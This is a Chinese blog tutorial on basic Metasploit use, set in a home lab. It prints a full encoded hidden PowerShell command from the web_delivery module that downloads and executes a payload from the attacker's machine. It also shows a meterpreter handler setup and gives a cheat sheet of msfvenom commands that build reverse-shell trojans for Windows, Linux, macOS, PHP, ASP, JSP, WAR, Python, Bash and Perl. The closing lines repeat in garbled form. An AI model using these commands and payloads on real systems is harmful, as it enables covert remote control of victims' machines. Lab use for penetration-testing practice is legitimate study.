msf基础使用

2023-12-13 14:14:20

MSF

msfconsole常规用法

终端输入msfconsole

image-20231212184225001

通过命令执行连接对方主机

使用exploit/multi/script/web_delivery 模块

use exploit/multi/script/web_delivery

image-20231212185138427

进入模块后可以使用以下命令,进行攻击的配置

show targets #查看可选择的目标类型
set target 对应编号|目标类型 #设置攻击目标
show payloads #查看可利用的payload,在选择完target后可显示对应的payload
set payload 对应编号|目标类型 #设置攻击载荷
show options #显示利用模块,所需参数,以及目前设置的参数
set lhost #设置服务器ip 填自己主机的 反向连接时需要
set lport #设置服务器端口
set rhost #设置目标主机ip
set rport #设置目标主机端口 
run / expliot #运行模块

这里演示一下对windows的攻击,前提是需要在目标主机上可以命令执行

攻击主机kali:192.168.52.128 靶机windows11

image-20231212190346833

image-20231212190404943

复制上面显示的这段命令

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB4AEcAWgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJAB4AEcAWgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAHgARwBaAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUAMgAuADEAMgA4ADoAOAAwADgAMAAvAGIATQBXAHMAdwBZAHMATABhAFkAagBEAC8AQQBXAEUAMQBvAHkARwBTAEkAcQBlAGIAagB2ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQAyAC4AMQAyADgAOgA4ADAAOAAwAC8AYgBNAFcAcwB3AFkAcwBMAGEAWQBqAEQAJwApACkAOwA=

目标主机运行

image-20231212190519127

image-20231212190702730

image-20231212190718234

这里运行后,可能会卡住,直接摁回车

然后输入sessions 即可以查看是否成功控制目标主机

image-20231212190918157

关于session相关命令

show sessions | sessions #显示获取的所有会话
sessions -i 对应的会话id #使用此会话,并且进入meterpreter后渗透模块
进入meterpreter 切记不要随便使用exit离开,会导致会话直接消失
可以使用background 进行后台运行sessions #后台运行sessions

结合Msfvenom模块进行后门攻击

exploit/multi/handler模块 eg.这里依然以windows举例

use exploit/multi/handler  
set payloa windows/meterpreter/reverse_tcp
set lhost 192.168.52.128
set lport 1111
exploit -z -j#后台执行

前提是利用Msfvenom生成木马,并且在目标主机上执行此木马

这里不举例了,想看例子的可以查看这篇msf生成木马_msfvenom -p linux/x86/meterpreter/reverse_tcp lhos-CSDN博客

博客

Msfvenom生成木马

常用命令生成木马

Linux

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

 msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads

PHP

  msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads

Python

  msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

  msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

  msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

hell.sh


Perl

```bash
  msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

文章来源:https://blog.csdn.net/longwanlian/article/details/134957098
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。